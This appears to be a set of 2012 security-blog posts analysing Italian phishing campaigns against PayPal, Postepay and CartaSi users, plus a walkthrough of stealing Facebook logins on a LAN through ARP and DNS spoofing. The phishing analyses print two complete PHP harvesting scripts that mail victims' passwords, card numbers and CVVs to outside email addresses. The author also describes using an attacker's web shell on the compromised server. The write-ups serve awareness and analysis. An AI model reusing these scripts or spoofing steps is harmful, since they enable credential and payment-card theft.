His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-zZw2OhA9aWE/T4k91tfprCI/AAAAAAAAAJc/qkl7bcjT1Ng/s1600/romanian_write.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-zZw2OhA9aWE/T4k91tfprCI/AAAAAAAAAJc/qkl7bcjT1Ng/s1600/romanian_write.JPG" /></a></div>
I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:<br />
<ol>
<li><b>d3b</b> (postepay information stealer)</li>
<li><b>stf</b> (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)</li>
<li><b>pastote</b> (cartasi, paypal, VISA, bancopostaclick)</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RLBaTnVaVTU/T4hr-wEHptI/AAAAAAAAAJU/lnZeSrDZ-b4/s1600/hacked_by.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="http://3.bp.blogspot.com/-RLBaTnVaVTU/T4hr-wEHptI/AAAAAAAAAJU/lnZeSrDZ-b4/s640/hacked_by.JPG" width="640" /></a></div>
<br />
Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-D1SZJDt3S08/T4c5GlFQ_AI/AAAAAAAAAIE/Ci4R8iWZMRA/s1600/mass_mailer.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="http://1.bp.blogspot.com/-D1SZJDt3S08/T4c5GlFQ_AI/AAAAAAAAAIE/Ci4R8iWZMRA/s640/mass_mailer.JPG" width="640" /></a></div>
<br />
The emails address are stored in 30 rar files named pastoteXX.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Du1pJpauAVY/T4hoIvE9-AI/AAAAAAAAAJM/_EuGhphvm1E/s1600/list_emails.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="524" src="http://2.bp.blogspot.com/-Du1pJpauAVY/T4hoIvE9-AI/AAAAAAAAAJM/_EuGhphvm1E/s640/list_emails.JPG" width="640" /></a></div>
<br />
From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.<br />
<br />
When a victim click on the link will be redirected to this fake page on this site.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Y74USGYquAc/T4heQhumrQI/AAAAAAAAAIc/2yUQP08tkM8/s1600/paypal_fake.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="http://4.bp.blogspot.com/-Y74USGYquAc/T4heQhumrQI/AAAAAAAAAIc/2yUQP08tkM8/s640/paypal_fake.JPG" width="640" /></a></div>
<br />
Once logged in<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-I9cOQl8Aiyc/T4hkm2q0acI/AAAAAAAAAI8/lLvKYTjs9Pk/s1600/paypal_loading.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-I9cOQl8Aiyc/T4hkm2q0acI/AAAAAAAAAI8/lLvKYTjs9Pk/s640/paypal_loading.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FaQyrHQOVg8/T4hkr29X4QI/AAAAAAAAAJE/GFVGty5kAl0/s1600/paypal_insert_data.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="466" src="http://3.bp.blogspot.com/-FaQyrHQOVg8/T4hkr29X4QI/AAAAAAAAAJE/GFVGty5kAl0/s640/paypal_insert_data.JPG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Once filled the form and clicked send the data are redirected to a script called <b>trimite.php</b> which translated from romanian means <b>send/forward. </b>This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.<br />
<br />
<pre class="brush: html">$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];
$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];
//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$mesaj_html ="
<style>
</style>
<center>
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Indirizzo email</b></td>
<td style="font-family: tahoma; font-size: 11px;">$username</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Password PayPal</b></td>
<td style="font-family: tahoma; font-size: 11px;">$password</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Nome</b></td>
<td style="font-family: tahoma; font-size: 11px;">$nome</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Gnome</b></td>
<td style="font-family: tahoma; font-size: 11px;">$cognome</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Data di nascita:</b></td>
<td style="font-family: tahoma; font-size: 11px;">$dob_ziua:$dob_luna:$dob_an(ziua:luna:an)</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Indirizzo</b></td>
<td style="font-family: tahoma; font-size: 11px;">$address1</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>CAP</b></td>
<td style="font-family: tahoma; font-size: 11px;">$zip</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>CittĂ </b></td>
<td style="font-family: tahoma; font-size: 11px;">$city</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Provincia</b></td>
<td style="font-family: tahoma; font-size: 11px;">$state</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Tipo di carta di credito</b></td>
<td style="font-family: tahoma; font-size: 11px;">$c_tip</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Numero della carta di credito</b></td>
<td style="font-family: tahoma; font-size: 11px;">$cn</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Data di scadenza</b></td>
<td style="font-family: tahoma; font-size: 11px;">$luna/$an</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Codice di sicurezza della carta</b></td>
<td style="font-family: tahoma; font-size: 11px;">$cvv</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>IP</b></td>
<td style="font-family: tahoma; font-size: 11px;">$ip</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Data</b></td>
<td style="font-family: tahoma; font-size: 11px;">$data</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Browser</b></td>
<td style="font-family: tahoma; font-size: 11px;">$agent</td>
</tr>
</tbody></table>
";
mail($email, $subiect, $mesaj_html, $headers);
header("Location: http://www.paypal.it");</center></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-3bs9XHOfqNg/T4hiRzh183I/AAAAAAAAAI0/u72sdxiiuGw/s1600/paypal_original.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="http://4.bp.blogspot.com/-3bs9XHOfqNg/T4hiRzh183I/AAAAAAAAAI0/u72sdxiiuGw/s640/paypal_original.JPG" width="640" /></a></div>
<br />
He did a good job to replicate paypal login process.<br />
<br />
In the <b>stf</b> folder all stolen data are sent to <b>fanemacaz@gmail.com</b> and the techniques used to trick users are the same explained previously.<br />
<br />
Folder index file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-HOht-V1JUp4/T4qMbMeVAFI/AAAAAAAAAJ0/IBc5WptSddw/s1600/too_curious.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="http://4.bp.blogspot.com/-HOht-V1JUp4/T4qMbMeVAFI/AAAAAAAAAJ0/IBc5WptSddw/s640/too_curious.JPG" width="640" /></a></div>
<br />
Folder content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WzqAE6bkhgQ/T4qMCq6NAsI/AAAAAAAAAJk/s_CGjdUbOAI/s1600/stf_content.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="http://1.bp.blogspot.com/-WzqAE6bkhgQ/T4qMCq6NAsI/AAAAAAAAAJk/s_CGjdUbOAI/s640/stf_content.JPG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oqY_SvoP3WM/T4qMNFEznBI/AAAAAAAAAJs/yiPlBAFX2Mo/s1600/stf_mail_spammer.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="http://3.bp.blogspot.com/-oqY_SvoP3WM/T4qMNFEznBI/AAAAAAAAAJs/yiPlBAFX2Mo/s640/stf_mail_spammer.JPG" width="640" /></a></div>
That's all for now.<br />
<br />Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com4tag:blogger.com,1999:blog-3423828846307461333.post-1114072685464672212012-04-20T23:43:00.004+02:002012-04-20T23:43:51.052+02:00Poste Italiane phishing emails 2In this hours a "new" phishing attack is targetting Poste Italiane and his service called Postepay. In the previous article regarding <a href="http://security-obscurity.blogspot.it/2012/04/poste-italiane-phishing-e-mails.html">poste italiane phishing email</a> the phiser to convince the victim to send their account details said that they won a bonus of 250 euro.<br />
<br />
This time he chose another way that is more credible (in my opinion).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WVgtChyAwO4/T5E6rriSLyI/AAAAAAAAAKU/7bAtJFwphSs/s1600/email_content.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="http://3.bp.blogspot.com/-WVgtChyAwO4/T5E6rriSLyI/AAAAAAAAAKU/7bAtJFwphSs/s640/email_content.JPG" width="640" /></a></div>
<br />
The title says <b>we detected irregular activity on your Poste Italiane account</b> and the content proceed <b>for your protection you must download the attachment and fill the form. If you ignore this email your account will be temporarily suspended</b>.<br />
<br />
The sender is <b>support@update.com</b><br />
<br />
When you open the attachment you get this page with a central form ready to be filled with postepay account details (Username, Password, Credit Card Number, Expiration Date, Security Code).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-onpPgcbpWCc/T5FLAr1AaYI/AAAAAAAAAKs/Hd5cOSo2Zow/s1600/attachment.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="http://2.bp.blogspot.com/-onpPgcbpWCc/T5FLAr1AaYI/AAAAAAAAAKs/Hd5cOSo2Zow/s640/attachment.JPG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
In this file he haven't tried to obfuscated the form code as he did last time, so the address of the server where the data will be sent is easily visible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Z5jG1LcOGmA/T5FJ-El02wI/AAAAAAAAAKc/rZYk54WhzKs/s1600/data_sent.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="http://3.bp.blogspot.com/-Z5jG1LcOGmA/T5FJ-El02wI/AAAAAAAAAKc/rZYk54WhzKs/s400/data_sent.JPG" width="400" /></a></div>
<br />
This server is located in Poland and the ISP is Netia S.A.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Is-jcavqotc/T5GJM0MG9pI/AAAAAAAAALM/8Ah4TYM2PEc/s1600/server_location.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://2.bp.blogspot.com/-Is-jcavqotc/T5GJM0MG9pI/AAAAAAAAALM/8Ah4TYM2PEc/s640/server_location.JPG" width="640" /></a></div>
<br />
There aren't domains that point to this ip address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/--aOaXgVfQJc/T5GAJ7yPQgI/AAAAAAAAAK8/y6eTaj-Xj8I/s1600/other_domains.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="http://2.bp.blogspot.com/--aOaXgVfQJc/T5GAJ7yPQgI/AAAAAAAAAK8/y6eTaj-Xj8I/s640/other_domains.JPG" width="640" /></a></div>
<br />
The server is running a copy of Windows Server 2003 with Apache2Triad which is a sort of WAMP only that the project is a dead since 2009. If you browse to this address the index page will look like this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Ecutuv-4H08/T5GLUd4VXDI/AAAAAAAAALU/drpUOsIGjdQ/s1600/index.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://3.bp.blogspot.com/-Ecutuv-4H08/T5GLUd4VXDI/AAAAAAAAALU/drpUOsIGjdQ/s640/index.JPG" width="640" /></a></div>
<br />
He created an index that doesn't list the other files on the server. As you can image <b>sobo.php </b>script collect the stolen data, save this information in a txt file or send an email to the phisher and at the end redirect the victim to the original site. What will be its content ?<br />
<br />
Downloaded with wget, so no php: <a href="http://pastebin.com/znxS8aet">index page</a><br />
<br />
I was expecting to see a meta tag or nothing, instead i found a copy of Poste Italiane website. Here it is a screenshot posted on <a href="http://www.phishtank.com/phish_detail.php?phish_id=1416490">PhishTank</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.phishtank.com/screenshot_proxy.php?phish_id=1416490" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="554" src="http://www.phishtank.com/screenshot_proxy.php?phish_id=1416490" width="640" /></a></div>
Maybe this mean that he started redirecting the victims to this site and then stole the information, now he sends an attachment.<br />
<br />
That's all for now.Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-84959164015556812382012-04-19T13:01:00.001+02:002012-04-19T13:01:33.820+02:00ARP/DNS Spoofing Steal Facebook Password (LAN Environment)In this video i'll show you how an attacker can steal user credentials of every site (in this case will be facebook) in a LAN environment. First of all we use <a href="http://www.secmaniac.com/">SET</a> to clone the current facebook home page and setup a server listening on port 80 with that copy.<br />
<br />
Next step is to discover potential victims mapping our network. There are tons of ways to do this through nmap, hping, ping command, but this time i used the linux command <b><a href="http://linux.die.net/man/1/arp-scan">arp-scan</a> </b>with the following syntax:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LzE3c4dxi24/T48BsX-T5wI/AAAAAAAAAJ8/ggRqhuU5Ymw/s1600/arpscan.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="http://1.bp.blogspot.com/-LzE3c4dxi24/T48BsX-T5wI/AAAAAAAAAJ8/ggRqhuU5Ymw/s640/arpscan.JPG" width="640" /></a></div>
<br />
After mapping the network i used a great tool called <b>netcmd</b> to perform an <a href="http://en.wikipedia.org/wiki/ARP_spoofing">arp spoofing</a> attack to redirect traffic through the attacker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RGGXBNIvugg/T48Cnv0Tu1I/AAAAAAAAAKE/WH1Tg9M7zv0/s1600/netcmd.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://3.bp.blogspot.com/-RGGXBNIvugg/T48Cnv0Tu1I/AAAAAAAAAKE/WH1Tg9M7zv0/s640/netcmd.JPG" width="640" /></a></div>
<br />
Last step is to perform a <a href="http://en.wikipedia.org/wiki/DNS_spoofing">dns spoofing</a> attack so all request sent by the victim to facebook.com will be redirected to the attacker. To do this we need to use ettercap and modify <b>/usr/share/ettercap/etter.dns </b>adding this two lines<b>.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-kyMK5i0FbHc/T48DC64pSAI/AAAAAAAAAKM/T1DUFzOEl-s/s1600/etter.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="http://2.bp.blogspot.com/-kyMK5i0FbHc/T48DC64pSAI/AAAAAAAAAKM/T1DUFzOEl-s/s400/etter.JPG" width="400" /></a></div>
<br />
After lunched ettercap we have just to wait for the victim to login into his facebook account.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/A4hH5PHMk6s" width="640"></iframe><br />
<br />
Enjoy the video.Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-21088321639377147052012-04-15T11:04:00.000+02:002012-04-15T11:04:14.619+02:00CartaSi phising email part 1/2CartaSi is a credit/charge card and can be used in Italy and abroad.<br />
<br />
The 31st of March i received an email from <b>CartaSi_Informa@cartasi.it</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-0JuCcLmc2Kw/T4NbwIbVBqI/AAAAAAAAAGs/jxby9zia0J4/s1600/cartasi_email_content3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-0JuCcLmc2Kw/T4NbwIbVBqI/AAAAAAAAAGs/jxby9zia0J4/s640/cartasi_email_content3.JPG" width="640" /></a></div>
<br />
It is a classic phishing email and it says to download the attachment in order to unlock your account. One strange thing are the two cyrillic words at the end, maybe this text has been translated from russian/ucrainan by someone because there aren't mistakes and they forgot the two letters.<br />
<br />
Why they haven't better controlled before sending ?<br />
<br />
The italian missing letters are <b>è</b> and <b>Ă¹ </b>that are with accent, so maybe this is a fail encoding by hotmail or the software that they used to send the email.<br />
<br />
By the way phishers have used a creadible domain name (cartasi.it), which is the original. The attachment to download has name "CartaSi Secure Department" and if you open with a browser will look like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-lpEXAslXn8E/T4NkVAZPhaI/AAAAAAAAAG8/dPZLToZIePE/s1600/attachment.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="410" src="http://2.bp.blogspot.com/-lpEXAslXn8E/T4NkVAZPhaI/AAAAAAAAAG8/dPZLToZIePE/s640/attachment.JPG" width="640" /></a></div>
<br />
Here it is the original.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Q1A4MumrI2Q/T4WigHEhYFI/AAAAAAAAAHk/5pX4kQJrKSM/s1600/original_cartasi_page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://4.bp.blogspot.com/-Q1A4MumrI2Q/T4WigHEhYFI/AAAAAAAAAHk/5pX4kQJrKSM/s640/original_cartasi_page.JPG" width="640" /></a></div>
<br />
Opening the attachment with a text editor we can see where the stolen data will be redirected, but also this time the initial FORM tag is encoded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-uvEF0zMiyPk/T4WkCO3z8pI/AAAAAAAAAHs/nO5LfvpGkvo/s1600/encoded_sourcecode.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="http://3.bp.blogspot.com/-uvEF0zMiyPk/T4WkCO3z8pI/AAAAAAAAAHs/nO5LfvpGkvo/s640/encoded_sourcecode.JPG" width="640" /></a></div>
<br />
Once decoded we get this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-iZLUe5smjXA/T4WkxMKSLoI/AAAAAAAAAH0/sYyz_FnbKA4/s1600/decode_sourcecode.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="http://2.bp.blogspot.com/-iZLUe5smjXA/T4WkxMKSLoI/AAAAAAAAAH0/sYyz_FnbKA4/s640/decode_sourcecode.JPG" width="640" /></a></div>
<br />
Let's analyze the domain with a whois service.<br />
<br />
Domain details:<br />
<ul>
<li>Registered: 7 September 2011</li>
<li>Exipres: 7 September 2012</li>
<li>Registrar of record: TUCOWS, INC.</li>
<li>Record last update: 23 March 2012 </li>
</ul>
<div>
Others details are omitted.</div>
<div>
<br /></div>
<div>
Right now the homepage is a blank page but i found a cached page taken the 15th of March by google's crawlers.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-DYyA_3rwxdM/T4NpSz1xH1I/AAAAAAAAAHE/gRrXKKmkWIQ/s1600/cached_website.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="http://1.bp.blogspot.com/-DYyA_3rwxdM/T4NpSz1xH1I/AAAAAAAAAHE/gRrXKKmkWIQ/s640/cached_website.JPG" width="640" /></a></div>
<div>
<br /></div>
<div>
This was a legit website running wordpress cms and throught one of his/plugin flaws the phishers were able to upload a shell. The <b>shel</b> folder hasn't an index file and it hasn't an .httaccess to prevent directory listing so here it is the content.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-GDfIFaXEAtk/T4NtJ0MVT9I/AAAAAAAAAHU/c0CeLrJAEmc/s1600/shel_content.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-GDfIFaXEAtk/T4NtJ0MVT9I/AAAAAAAAAHU/c0CeLrJAEmc/s1600/shel_content.JPG" /></a></div>
<div>
As you can see there are several files but the most important are <b>cartasi.txt</b> and <b>go1.php</b>. The php file stores stolen information into cartasi.txt and maybe does others things. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-I4q93KOCQ5Y/T4NuRuviYLI/AAAAAAAAAHc/BhKs_CNpe-M/s1600/cartasi_txt.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-I4q93KOCQ5Y/T4NuRuviYLI/AAAAAAAAAHc/BhKs_CNpe-M/s1600/cartasi_txt.JPG" /></a></div>
<div>
<br /></div>
<div>
Neither pastote folder hasn't a proper htaccess file but has an index.php file. His mistake was to name the file with an initial uppercase letter so all files are listed.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-3YHY1yV4vfg/T4WlLeQFLGI/AAAAAAAAAH8/M692rcyJXdk/s1600/pastote_dirlist.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://3.bp.blogspot.com/-3YHY1yV4vfg/T4WlLeQFLGI/AAAAAAAAAH8/M692rcyJXdk/s640/pastote_dirlist.JPG" width="520" /></a></div>
<br /></div>
<div>
The funniest thing is that pollo.php is a c99 shell, abc.php is an "<b>evilc0der v. edition ADVANCED!</b>" shell, both with no password protection, so everyone can use it to download, upload and do others things. I used a shell to download go1.php to see what this script does other than append stolen information to cartasi.txt and redirect to http://www.bancopostaclik.it/mc_securcode.shtml.</div>
<div>
<br /></div>
<div>
Here it is the code.</div>
<div>
<pre class="brush: php">$username = $_POST['loginx'];
$password = $_POST['passwdx'];
$name = $_POST['name'];
$ccnumb = $_POST['ccnumb'];
$month = $_POST['month'];
$year = $_POST['year'];
$cvv = $_POST['cvv2'];
$condice = $_POST['condice'];
$name = $_POST['name'];
$email = $_POST['email'];
$pswmail = $_POST['pswmail'];
$dsecure = $_POST['3dsecure'];
$ip = getenv("REMOTE_ADDR");
$datamasii = date("D M d, Y g:i a");
$message .=".............................................\n";
$message .="Username : $username\n";
$message .="Password : $password\n";
$message .="Full Name: $name\n";
$message .="CCNumber : $ccnumb\n";
$message .="Exp : $month/$year\n";
$message .="Cvv2 : $cvv\n";
$message .="3D Secure: $dsecure\n";
$message .="CFiscal : $condice\n";
$message .="Mail : $email\n";
$message .="Pasw : $pswmail\n";
$message .="Date : $datamasii \n";
$message .="..............................................\n";
$message .="©IP $ip\n";
$subject = " CartaSi ";
$file = fopen("cartasi.txt", "a");
fputs ($file, "$message\r\n");
fclose ($file);
mail("--snip--@fastwebmail.it",$subject,$message);
header("Location: http://www.cartasi.it/gtwpages/common/index.jsp?id=HgSgFKmncL");
</pre>
</div>
<div>
The other thing is send an email to a fastweb email. Fastweb is an Italian broadband telecommunications company and it provides voice, Internet, cable television, IPTV services. His email are provided with a contract and this mean two things:</div>
<div>
<ol>
<li>Phisher have hacked an email of an user</li>
<li>It is his own email.</li>
</ol>
<div>
That's it, in the next part i will examinate all other files.</div>
</div>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-85779134126269320822012-04-06T11:07:00.000+02:002012-04-06T11:26:59.281+02:00Poste Italiane phishing emailsPoste italiane is the government-owned postal service of Italy and spammers use phishing techniques to trick people to send their credentials of online accounts and credit cards.<br />
<br />
The first of april i received an email from <b>bancoposta@bpolbpol.com</b> with this content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-XLZTjPc88l8/T3sGKdQLDiI/AAAAAAAAAF8/SFRNFwrMJQQ/s1600/poste_phishing.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://4.bp.blogspot.com/-XLZTjPc88l8/T3sGKdQLDiI/AAAAAAAAAF8/SFRNFwrMJQQ/s640/poste_phishing.JPG" width="640" /></a></div>
<br />
Basically it says that i have been selected to get a bonus of 250 euro and in order to complete the operation i must download the attachment.<br />
<br />
First of all we see that the domain of the sender is neither poste.it or postepay.it, this is kinda strange to be a legitimate email. I was curious to know the type of site behind the domain so i navigate to that url and i get a white screen with a blue write "website under construction".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tnVBbmWcR78/T3sHi3n1HsI/AAAAAAAAAGE/ijkRuJuW-uQ/s1600/poste_under_costruction.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="http://2.bp.blogspot.com/-tnVBbmWcR78/T3sHi3n1HsI/AAAAAAAAAGE/ijkRuJuW-uQ/s640/poste_under_costruction.JPG" width="640" /></a></div>
<br />
Maybe we can get more information checking throgh <a href="http://whois.domaintools.com/">http://whois.domaintools.com</a> who registered that domain.<br />
<br />
Few details:<br />
<ul>
<li>Record created: 2/7/2011</li>
<li>Record expires: 2/7/2012.</li>
<li>Registration service provider: Aruba S.p.A. </li>
</ul>
Others details are omitted, because contains owner personal information.<br />
<br />
The strange think about this website is that it has never been linked or added to google, so no one can find it throught a search engine. Since it's not linked i cannot search for a chaced page, consequently i cannot know what type of website was running.<br />
<br />
We take a brief look to nslookup and we discover that has its own mail server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-y_Tyl3rn-us/T3siaFRma4I/AAAAAAAAAGM/vy3nhOA0uaw/s1600/nslookup.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-y_Tyl3rn-us/T3siaFRma4I/AAAAAAAAAGM/vy3nhOA0uaw/s1600/nslookup.JPG" /></a></div>
<br />
Since we cannot know if this site was operable i can say that the smtp server was used to spread spam without the owner's knowledge.<br />
<br />
Now it's time to see what is the attachment. It's a simple html file called <b>Document.html </b>and if you open with a browser you get a postepay page with a central form where are listed different fields such as username, password, credit card number, expiration date and security code ready to be filled.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-celOq8kvFVI/T31B-9qaHoI/AAAAAAAAAGc/V8eBoZ0R1D8/s1600/fake_site.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="http://4.bp.blogspot.com/-celOq8kvFVI/T31B-9qaHoI/AAAAAAAAAGc/V8eBoZ0R1D8/s640/fake_site.JPG" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
As you can see it looks very similar to the original, they did a pretty good job.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
